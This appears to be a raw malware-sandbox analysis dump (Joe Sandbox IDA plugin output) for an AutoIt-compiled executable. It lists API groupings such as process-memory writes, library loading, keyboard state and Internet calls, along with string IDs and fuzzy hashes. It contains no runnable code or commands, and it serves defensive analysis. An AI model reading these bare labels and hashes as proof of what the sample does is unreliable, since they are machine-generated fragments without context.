                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharForegroundUpperWindow
                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                            • API String ID: 3570115564-1994484594
                                                            • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                            • Instruction ID: e4fa6ab90564acd17c6fcfb958f1129745af3da557b79e5359f2438b496207b5
                                                            • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                            • Instruction Fuzzy Hash: 40717052B18AC3C1EE64BB65F8012FAE2A1AF54784FCD4031D90EA7695EF7DE9458320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                            • Instruction ID: 5791a7103af0a1ffe392ce1e2ad63386f08f60c5f7c21e9c0eb1f58e12a2bd7f
                                                            • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                            • Instruction Fuzzy Hash: 2141AA22F19AD3C1EE906F25A4541B9E292AB54BD4BDC0631CA5E83794EF3DED478320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: #$E$O
                                                            • API String ID: 3215553584-248080428
                                                            • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                            • Instruction ID: 3e6f5d3d9dc2a41bec3e1a443b31970cb5964667ffbc3fc300c2a108e84ff5a1
                                                            • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                            • Instruction Fuzzy Hash: 2E418E22A1AB9585EF51AF61A8405FDA3B1BF54B98F9C4031EE4E07799DF3CE845C320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                            • String ID: \*.*
                                                            • API String ID: 3196045410-1173974218
                                                            • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                            • Instruction ID: 573c3b2b119423114cbcfb0d40f73e9d0c8c2000ddb791bb78df6878ed1963f8
                                                            • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                            • Instruction Fuzzy Hash: 01414522A186D3D5EF20FB24E9401FDA764FF95788FC84031DA4D53A99EF28D909C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 787153527-1403004172
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3740051246-0
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD176
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD217
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD236
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD281
                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD2A0
                                                              • Part of subcall function 00007FF75F164120: WideCharToMultiByte.KERNEL32 ref: 00007FF75F164160
                                                              • Part of subcall function 00007FF75F164120: WideCharToMultiByte.KERNEL32 ref: 00007FF75F16419C
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                            • String ID:
                                                            • API String ID: 666041331-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            Similarity
                                                            • API ID: AddressProc
                                                            Similarity
                                                            • API ID: Window$Show$Enable
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            Similarity
                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            Similarity
                                                            • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            Similarity
                                                            • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C003C
                                                            • TerminateThread.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C0047
                                                            • WaitForSingleObject.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C0055
                                                            • ~SyncLockT.VCCORLIB ref: 00007FF75F1C005E
                                                              • Part of subcall function 00007FF75F1BF7B8: CloseHandle.KERNEL32(?,?,?,00007FF75F1C0063,?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1BF7C9
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C006A
                                                            Similarity
                                                            • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3142591903-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID:
                                                            • API String ID: 1611280651-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 948891078-24824748
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: P
                                                            • API String ID: 135850232-3110715001
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateObjectStock
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2671490118-1439706946
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                            • String ID: msctls_updown32
                                                            • API String ID: 1752125012-2298589950
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: %lu
                                                            • API String ID: 2507767853-685833217
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 1025951953-1010561917
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                            • String ID: %s%d
                                                            • API String ID: 2330185562-1110647743
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID: 0
                                                            • API String ID: 33631002-4108050209
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F1A2DD1), ref: 00007FF75F1DAF37
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F1A2DD1), ref: 00007FF75F1DAF4F
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            Similarity
                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                            • String ID:
                                                            • API String ID: 2000298826-0
                                                            Similarity
                                                            • API ID: Window$ClientMessageMoveRectScreenSend
                                                            • String ID:
                                                            • API String ID: 1249313431-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID:
                                                            • API String ID: 3076010158-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183DB1
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183E13
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183E4D
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183E77
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID:
                                                            • API String ID: 847901565-0
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 837644225-0
                                                            • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                            • Instruction ID: 7d2eb09fb20e609c56373a701ed24a916c4be75dbae4a95ce871c4a76cd477be
                                                            • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                            • Instruction Fuzzy Hash: EC21DE72A19B8186EF04EF61E8447A8B3A5FB44BD5F894139CA4D43748DF3DE842C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: CreateMessageObjectSendStockWindow
                                                            • String ID:
                                                            • API String ID: 3970641297-0
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2979156933-0
                                                            Similarity
                                                            • API ID: _ctrlfp
                                                            • String ID:
                                                            • API String ID: 697997973-0
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\EO3RT0fEfb.exe
                                                            • API String ID: 3307058713-1994901746
                                                            Similarity
                                                            • API ID: Window$CreateDestroyMessageObjectSendStock
                                                            • String ID: static
                                                            • API String ID: 3467290483-2160076837
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSendStock
                                                            • String ID: $SysTabControl32
                                                            • API String ID: 2080134422-3143400907
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Combobox
                                                            • API String ID: 1025951953-2096851135
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$pow
                                                            • API String ID: 1757819995-713443511
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-3916222277
                                                            • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                            • Instruction ID: b32c26708a9d385ad8e9acd8ad14d21a83bfd255d632d657b4c156082e963887
                                                            • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                            • Instruction Fuzzy Hash: 7A1186B1A0878186E710EF16F90019AF7A1FB84784F884139DA8D47A64CF3DD550CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                            • Instruction ID: 8bc42b94e4e67c852ba21b84e22be9febd68f8fceedfd18e609ddfcacb6a53ad
                                                            • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                            • Instruction Fuzzy Hash: 70015E66A199C291EE20F724F5915F9E360EB85384FC84131E59D07A9ADF2CD609CB60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$tan
                                                            • API String ID: 3384550415-2428968949
                                                            • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                            • Instruction ID: d83e8bc5f3fc4b843bd867cc35a660cadb46ab9fd80067bbaa838fe508d232f5
                                                            • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                            • Instruction Fuzzy Hash: 40019672A28BC541DA14DF12A40037AA152BBDABD4F544334E95E1BB94EF7CD1508B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$sin
                                                            • API String ID: 3384550415-1565623160
                                                            • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                            • Instruction ID: d4ea29123299366c555af7bdee2bdfe5ef185af76d8c4cc34c796effb4e276ab
                                                            • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
